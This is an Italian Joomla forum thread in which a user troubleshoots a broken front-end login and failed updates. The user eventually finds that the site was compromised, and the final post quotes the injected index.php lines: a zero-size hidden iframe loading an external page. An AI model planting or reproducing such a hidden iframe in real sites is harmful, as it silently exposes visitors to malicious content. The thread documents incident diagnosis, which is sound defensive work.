Back to top

Autore Topic: [RISOLTO] Login frontend "nullo"  (Letto 2106 volte)

Offline ivantee

• Nuovo arrivato
  • *
    • Mostra profilo
[RISOLTO] Login frontend "nullo"
« il: 28 Feb 2013, 14:52:15 »
Ciao a tutti, mi chiamo Ivan e sono nuovo del forum.
L'anno scorso ho creato un sito di tecnologia con joomla per un mio amico, e per me è stata la seconda esperienza con joomla.
Mi sono iscritto al forum perchè da Gennaio 2013 abbiamo un problema molto fastidioso, ho fatto milioni di ricerche e sono arrivato al punto dell'esasperazione  :'(

Il mio problema è legato al login Frontend di joomla che è correlato anche con il login del forum Kunena.
Praticamente dai primi di Gennaio 2013 inserendo le credenziali di accesso e cliccando su Accedi, il sistema mi ricarica solo la pagina e non fa nessun accesso :(
Anche provando a mettere dati errati, il sistema non ritorna nessun errore e ricarica solo la pagina!

In un anno non ho mai toccato nessuna impostazione (l'unico Super Admin sono io), la cosa strana è che dal nuovo anno questo login non funziona più  :'(
Ho già controllato un sacco di file e impostazioni ed ormai ha 2 mesi che quei pochi utenti che il mio amico ha, non riescono ad entrare.

Ho anche scritto sul forum inglese di supporto di Kunena e mi hanno risposto che il problema è del login di joomla dato che Kunena prende i dati dal login di joomla.

Vi comunico alcune informazioni (se è possibile, vi linkerò anche il sito):
Joomla 2.5.1
Forum Kunena 2.0.4

Se vi servono altre informazioni per capire il problema, non esitate a chiedere ovviamente!

Grazie a tutti, spero mi possiate aiutare.
« Ultima modifica: 04 Mar 2013, 19:48:54 da ivantee »

Offline maicolstaip

• Global Moderator
  • Instancabile
    • Mostra profilo
Re:Login frontend "nullo"
« Risposta #1 il: 28 Feb 2013, 15:08:42 »
Benvenuto nel forum di joomla.it ivantee,
prima cosa devi aggiornare all'ultima versione, la 2.5.9 in questo momento.

Se poi hai ancora quel problema, l'unica cosa che mi viene in mente è quella di scaricare via ftp il file configuration.php, aprirlo con un editor e salvarlo come utf-8 senza bom.
Poi lo rimetti in root sempre via ftp sovrascrivendo quello del server.

E' la soluzione che a me ha funzionato in un problema identico al tuo ( il sistema mi ricarica solo la pagina e non fa nessun accesso)

Ciao!
Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline ivantee

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #2 il: 28 Feb 2013, 16:37:45 »
Ciao, intato ti ringrazio per la risposta e mi sono un pò rasserenato che anche tu hai avuto il mio stesso problema e sei riuscito a risolvere :)

Benvenuto nel forum di joomla.it ivantee,
prima cosa devi aggiornare all'ultima versione, la 2.5.9 in questo momento.
E' possibile passare direttamente alla 2.5.9 dalla mia attuale versione?
Se mi collego al pannello di amministrazione mi dice di passare alla 2.5.2

Se poi hai ancora quel problema, l'unica cosa che mi viene in mente è quella di scaricare via ftp il file configuration.php, aprirlo con un editor e salvarlo come utf-8 senza bom.
Poi lo rimetti in root sempre via ftp sovrascrivendo quello del server.
Questa prova credo di averla già fatta ma per sicurezza controllo e riprovo.
Come faccio a salvarlo senza bom?

Grazie ancora  ::) :)

UPDATE: ok, ho trovato la voce Encoding su Notepad++ :)
« Ultima modifica: 01 Mar 2013, 13:55:59 da ivantee »

Offline ivantee

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #3 il: 03 Mar 2013, 18:55:18 »
Ciao, allora ecco il punto della situazione:

Per prima cosa ho provato a salvare il file di configurazione in UTF-8 senza bom, ma non è cambiato nulla.

Inoltre ha dalle 16.00 che provo ad aggiornare joomla alla versione 2.5.9 senza nessun risultato :(
Ho provato sia tramite l'aggiornamento automatico da pannello di amministrazione e sia tramite il caricamento dei file nella cartella tmp e purtroppo in entrambi i casi il sistema mi restituisce il seguente errore:
SI E' VERIFICATO UN ERRORE. COPIA FALLITA

Nelle informazioni di sistema alla voce Permessi Cartella, ho tutto in Scrivibile... perchè non funziona? :'(

EDIT: ho scaricato la 2.5.9 da qui http://www.joomla.it/download/joomla-2/564-joomla-2-5.html
« Ultima modifica: 03 Mar 2013, 18:59:34 da ivantee »

Offline hapax

• Instancabile
    • Mostra profilo
« Risposta #4 il: 03 Mar 2013, 19:03:30 »
- scegliere con attenzione la sezione in cui aprire la discussione
- descrivere l'ambiente in cui si verifica il problema (se il problema è su un sito remoto inserite il link al sito)
- se il problema viene poi risolto, metti per cortesia [RISOLTO]

Offline ivantee

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #5 il: 03 Mar 2013, 20:39:02 »
...per aggiornare dalla versione 2.5.2 alla 2.5.9

http://www.joomla.it/download/joomla-2/560-aggiornamento-da-joomla-2-5-x-a-joomla-2-5.html

segui le indicazioni

ciao

;)

Grazie per la risposta, ma il risultato non cambia :'(

Ho scompattato l'archivio in una cartella che ho chiamato joom_25x, caricata nella cartella tmp e poi dal menu Estensioni ho fatto partire l'installazione ma l'errore è sempre quello :(

mau_develop

• Visitatore
« Risposta #6 il: 03 Mar 2013, 20:58:52 »
ma le path di cache e tmp sono corrette?

Offline ivantee

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #7 il: 03 Mar 2013, 21:06:37 »
ma le path di cache e tmp sono corrette?
Ciao, si certo!
Joomla da sempre mi rileva in automatico la corretta cartella tmp, se il percorso fosse errato riceverei il seguente messaggio: Inserisci la cartella del pacchetto.

Porca miseria tutte a me capitano :'(

Vi prego sono disperato, ditemi se vi può servire farvi vedere il file configuration.php o il .htaccess del sito in questione... non so più che pesci pigliare :'( :'( :'( 
« Ultima modifica: 03 Mar 2013, 21:28:47 da ivantee »

Offline ivantee

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #8 il: 04 Mar 2013, 19:48:27 »
Ciao, ho risolto il problema!
Qualcuno (penso tramite qualche bug del forum) mi ha bucato il sistema, modificando la index.php di joomla ed inserendo a capo pagina queste 2 righe:

Codice: [Seleziona]
<html><body>
<iframe width="0" height="0" src="http://www.tel74.com/free33.html" frameborder="0"></iframe>
</body></html>

Pertanto la funzione <? session() ?> non riusciva a caricare la sessione.
Inoltre quella maledetta pagina mi aveva leggermente alterato gli inputbox ed i caratteri rendendoli più grandi.

Forse questo iframe è anche la causa della mia non riuscita nell'aggiornamento, eventualmente vi farò sapere.

Ciao e grazie!!!

Web Design Bolzano Kreatif